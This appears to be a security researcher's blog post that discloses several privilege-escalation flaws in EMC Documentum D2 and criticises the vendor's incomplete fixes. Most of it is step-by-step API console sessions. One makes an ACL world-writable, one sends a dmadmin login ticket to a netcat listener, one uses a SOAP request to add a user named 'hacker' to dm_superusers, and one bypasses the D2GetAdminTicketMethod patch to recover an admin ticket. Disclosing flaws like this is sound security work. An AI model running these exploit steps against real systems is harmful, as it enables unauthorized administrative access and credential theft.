Second dive into D2 security

Read previous one.

D2UpdateChildACLMethod

API> retrieve,c,dm_acl where object_name='dm_acl_superusers'
...
45022483800001bc
API> dump,c,45022483800001bc
...
USER ATTRIBUTES

  object_name                     : dm_acl_superusers
  description                     : ACL of superusers used for Docbase Administration
  owner_name                      : d2
  globally_managed                : F
  acl_class                       : 0

SYSTEM ATTRIBUTES

  r_is_internal                   : F
  r_accessor_name              [0]: dm_world
                               [1]: dm_owner
                               [2]: admingroup
  r_accessor_permit            [0]: 1
                               [1]: 7
                               [2]: 7
  r_accessor_xpermit           [0]: 0
                               [1]: 0
                               [2]: 0
  r_is_group                   [0]: F
                               [1]: F
                               [2]: T
  r_has_events                    : F
  r_permit_type                [0]: 0
                               [1]: 0
                               [2]: 0
  r_application_permit         [0]:
                               [1]:
                               [2]:
  r_template_id                   : 0000000000000000
  r_alias_set_id                  : 0000000000000000
  r_object_id                     : 45022483800001bc

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_has_required_groups           : F
  i_has_required_group_set        : F
  i_has_access_restrictions       : F
  i_partition                     : 0
  i_is_replica                    : F
  i_vstamp                        : 0

API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
[DM_API_E_NO_MATCH]error:  
   "There was no match in the docbase for the qualification: 
      dm_method where object_name='dm_GroupRename'"

API> create,c,d2_acl_config
...
000224838000012b
API> set,c,l,object_name
SET> ACL of superusers used for Docbase Administration
...
OK
API> append,c,l,accessor_name
SET> dm_world
...
OK
API> append,c,l,condition_attr_name
SET>
...
OK
API> append,c,l,condition_attr_value
SET>
...
OK
API> append,c,l,accessor_permit
SET> 7
...
OK
API> append,c,l,accessor_xpermit
SET> 0
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2UpdateChildACLMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -acl_config_name "ACL of superusers used for Docbase Administration"
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
100224838000056e
API> get,c,l,_permit
...
7

D2RefreshCacheMethod

nc:

nc -l 7777

api:

API> create,c,d2_options
...
000224838000012c
API> append,c,l,client_urls
SET> http://localhost:7777/
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2RefreshCacheMethod,
     ARGUMENTS,S,'-docbase_name d2 -password "" -all true',SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002c87
  result_doc_id                   : 0902248380002c87
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> getpath,c,0902248380002c87
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/0a/b6.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/0a/b6.txt
==== START ======================================================================
...............
Refresh cache URL http://localhost:7777/servlet/..._password=DM_TICKET%3DT0...

nc:

GET /servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DT0... HTTP/1.1
User-Agent: Java/1.7.0_51
Host: localhost:7777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

D2WF{LaunchScheduledWorkflows, LifeCycle, ReceiveTaskMail, SendTaskMail}Method

If we execute method with SAVE_RESULTS=T we can get user ticket:

==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : ...
User  : d2_mail_manager
Domain  :
User password : DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9u...
New session manager creation.
Session manager set identity.
Session manager get session.
Tasks found : 0
==== END (0.166s) ================================================

D2FS

api:

API> retrieve,c,dm_user where user_name='hacker'
...
1102248380000541
API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

  config_security_group           :
  client_security_group           :
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                   []: <none>
  enable_compare                  : F
  attribute_list_display_mode     : 0
  node_user_security_group        : admingroup
  node_group_security_group       : admingroup
  node_group_user_parent          : node_admin
  node_group_display_all          : T
  dfc_validator                   : T
  in_create_config              []: <none>
  url_allowed_actions           []: <none>
  lock_config                     : F

SYSTEM ATTRIBUTES

  r_object_id                     : 000224838000012c

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_is_replica                    : F
  i_vstamp                        : 2

API> set,c,l,node_user_security_group
SET>
...
OK
API>
save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
           xmlns:con="http://www.emc.com/d2fs/services/content_service"
           xmlns:com="http://www.emc.com/d2fs/models/common"
           xmlns:prop="http://www.emc.com/d2fs/services/property_service" 
           xmlns:att="http://www.emc.com/d2fs/models/attribute"
           xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541" >
         <con1:context uid="2" login="hacker" password="hacker">
                <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>

api:

API> retrieve,c,dm_group where group_name='dm_superusers'
...
1202248380000101
API> dump,c,l
...
USER ATTRIBUTES

  group_name                      : dm_superusers
  group_address                   :
  users_names                  [0]: hacker
  groups_names                 [0]: dm_superusers_dynamic
                               [1]: dcs_privileged_users
  owner_name                      : d2
  is_private                      : F
  description                     :
  globally_managed                : F
  alias_set_id                    : 0000000000000000
  group_source                    :
  group_class                     : privilege group
  group_admin                     :
  is_dynamic                      : F
  is_dynamic_default              : F
  group_global_unique_id          : d2:dm_superusers
  group_native_room_id            : 0000000000000000
  group_directory_id              : 0000000000000000
  group_display_name              : dm_superusers
  is_protected                    : F
  is_module_only                  : F

SYSTEM ATTRIBUTES

  r_modify_date                   : 4/19/2014 22:54:42
  r_has_events                    : F
  r_object_id                     : 1202248380000101

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_all_users_names            [0]: hacker
  i_supergroups_names          [0]: dm_superusers
  i_nondyn_supergroups_names   [0]: dm_superusers
  i_is_replica                    : F
  i_vstamp                        : 4

Is it worth to treat flu if patient has cancer?

Here I described vulnerability in D2GetAdminTicketMethod docbase method, after that EMC released D2 4.2 where they have started encrypting return values passed through c6_method_return object, but their solution was still vulnerable, now in D2 4.2.1 they made a decision to treat snots instead of increasing technology level of D2. Note, that security advisory is still not published:

that according to the statements provided above means that EMC does not “want to inform customers about a new or updated recommendation on security best practices”.

Fortunately, EMC coders neither know the product they are trying to develop, nor read documentation. Follow my hands:

API> create,c,c6_method_return
...
000224838000011f
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -method_return_id 000224838000011f 
       -scope global 
       -timeout 3600
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> revert,c,000224838000011f
...
OK
API> get,c,000224838000011f,message
...
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT
uOluf/e5kmAui7LLr7LkeBYiKBXaJg72sDT2pKjWi6byYIQ/fim57QrxXR608Pw0meiADtHQXARF
c9PtRvavRM7+m1HrfcRAML7qFUJCrIjDhEf/MTA95ZPYM3tdp2aEcq0EspD4Cn//iwVW9DK5Vt5c
AmtGRUfA0rHB6UvGhWbH5hQb9itZCP3lMDEjBr2B/3jbBC+CuMvK049j1rBxV5h1XJGhjJ+oMJWg
kmvFAjoZJNuqUWCqWLHn+WyO5I5DA54qUtw/SERO1srCPP6jYuE2Ym6WaVRXDhzZCjQLz+fbciba
qSbTFdeXQFZAO2s24mKx3tetyAp9nS04pAfTyFlLsMN83LRIGCUwij3BrfTY4X9wq4WqQiAT3a8M
jHrCXpd/5tWLMVPm/0jSSgj/SMtzU4bVBHKoIFclzLq+ciIsy9hVKdV8dQBfWzt3brQqGv8H2TvR
VlTxwTJWLZ/chujhwmWBN/28tXzK6EhLs5mSVaJ/SI7A4VhEq3qtileKaSULKSZiZ4sIT2nFAG7r
vBDGiEGQ/iG7jITFWYq4boou305kfYuPqM1U0E1qo8UQ

API> ?,c,update c6_method_return object 
     set parameter_name[0]='-timeout', 
     set parameter_value[0]=(select message from c6_method_return 
        where r_object_id='000224838000011f') 
     where r_object_id='000224838000011f'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
        -docbase_name d2 
        -password "" 
        -method_return_id 000224838000011f 
        -scope global -timeout 3600
     ',
     SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002a67
  result_doc_id                   : 0902248380002a67
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> get,c,000224838000011f,message
...
AAAAEBBMjU2FE27RAOiKSkZdJZM7tl1ht+LhqjvPsmr9DPg3nVgGFyROrETPX6Wy8uuEWbtKSWs3
MNr8qe3EBNTejbieKZ2YzzUY/46fLdbOQFInczwrNCBoWF9zBnTlhoHK1f+ctpm9nUsK2wJbDZXb
mk6+1VO5RsUEuFV/qux5LBdXpIr7dRornpDJiBP5hoPILObq4++KvBfhZjaPxEnoOMksfwgmU8XC
oTady3QQNIpgnFdwKf6dOzSbmj3tsyycqul+YZ9Dqeq8dq532RW7/9l2uS/v8AoXsFeegyCada5m
KMh1gjtnkntIjk/i+sZoz1l8ilyNQs8d5dc5aIbvDCMWaxJgaUMOnPSVogj+d8poAoLfesOsuiCA
+0zkRrMBDuInW1gCAgNMHdKPaoO3nU1UgooLuV++w+OXawTyoP+oaVR7K4/q4Yy7AmH+r2LRZdT6
EELz2aJ/R7ao+OEUJQvuilxFcsQBJ4iIN5WzDCqzp9xa4wUtPkxmYXcuZmh+R5fHLo8OGop8lU38
NcnB7uGIBf9hdDfK92Ac3m/snRc2W4RE4pknixFIMumpqShMzkjBLZrPVYbf93E8b7LghlxCZ+6C
XM/HGowQd2ZILSn7HnKW7dWk+w8OJBl8n8cmgmIrxsjo0XJRKFy930MqREaAqZaMwbSfs0st6q4Y
EKki2b9HPicRPSTzmpXEnLrxe85taV3If5mLQelbeJcSoMNBpl7nC0FIcr4N1QHaTKtaRzeuUZQI
kmE8osy7RfiR9vuTWM6WoqpLt/eZCzancyS7tg6sjfp2eOFORCiSQ7loWaxLRDcze6rY+Ceb1LB2
RCZoV0CVzEz64lf7EC6SPPEGTi27QRZt4hnu/2w64YyN
API> get,c,000224838000011f,error
...

API> getpath,c,0902248380002a67
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/09/e1.txt
==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : {-docbase_name=d2, 
    -method_return_id=000224838000011f, 
    -password=, 
    -class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
    -scope=global,
    -timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp....
}
-Scope : global
-TimeOut : 3600
D2Method.passphrase MD5 : default
-SingleUse : true
D2Method.passphrase MD5 : default
==== END (0.095s) ================================================

It’s already second try to fix D2GetAdminTicketMethod vulnerability, and fix is still incomplete and wrong, what a shame, EMC can’t fix high-severity vulnerability within already 5 months.